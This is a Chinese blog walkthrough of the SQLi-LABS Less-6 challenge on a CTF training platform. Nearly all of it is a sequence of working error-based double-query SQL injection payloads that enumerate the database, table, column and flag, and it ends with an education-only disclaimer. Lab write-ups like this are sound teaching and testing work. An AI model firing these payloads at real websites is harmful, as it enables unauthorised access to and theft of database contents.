sqli-labs
1
点击启动靶机。
SQLi-LABS Page-1(Basic Challenges)
原理
双注入
模板:
select count(*),concat(([payload]),floor(rand(0)*2)) as a from [table_name] group by a
解法
发送 GET 请求,id 作为参数。
http://b3f804a6-9ba6-418d-ac25-bf8d48589b62.node5.buuoj.cn/Less-6/?id=1
?id=1'
没有报错。
?id=1"
发生错误。
构造闭合:
?id=1"; --+
正常输出。
判断列数:
?id=1" order by 1,2,3; --+
?id=1" order by 1,2,3,4; --+
到4时报错,有三列。
判断输出位置:
?id=-1" union select 1,2,3; --+
没有输出。
爆库名:
?id=-1" union select 1,count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor(rand(0)*2)) as a from information_schema.schemata group by a; --+
没有报错。
?id=-1" union select 1,count(*),concat((select schema_name from information_schema.schemata limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+
有个 ctftraining 表。
爆表名:
?id=-1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='ctftraining' limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+
有个 flag 表。
爆列名:
?id=-1" union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='ctftraining' limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+
查询 flag:
?id=-1" union select 1,count(*),concat((select flag from ctftraining.flag limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+
Flag
flag{6baf6140-4646-4f31-bb61-e42b13de98a1}
参考资料
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。
标签:Web,group,information,报错,--+,注入,id,select,schema From: https://blog.csdn.net/qq_34988204/article/details/138653604